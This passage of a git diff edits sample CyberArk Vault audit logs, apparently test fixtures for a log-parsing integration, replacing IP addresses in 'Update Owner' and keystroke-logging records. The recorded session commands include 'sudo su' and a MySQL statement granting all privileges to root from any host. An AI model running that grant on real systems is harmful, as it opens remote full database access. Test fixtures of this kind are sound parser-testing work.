Owner","GatewayStation":""}}} -<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 
11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update 
Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-11T17:38:14Z 
VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 67.43.156.13\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/361_keystroke_logging.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/361_keystroke_logging.log index 6c959f21d65..c6311470971 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/361_keystroke_logging.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/361_keystroke_logging.log 
@@ -1,7 +1,7 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"361","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 
34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:47Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n 
Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n 
\n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke 
logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
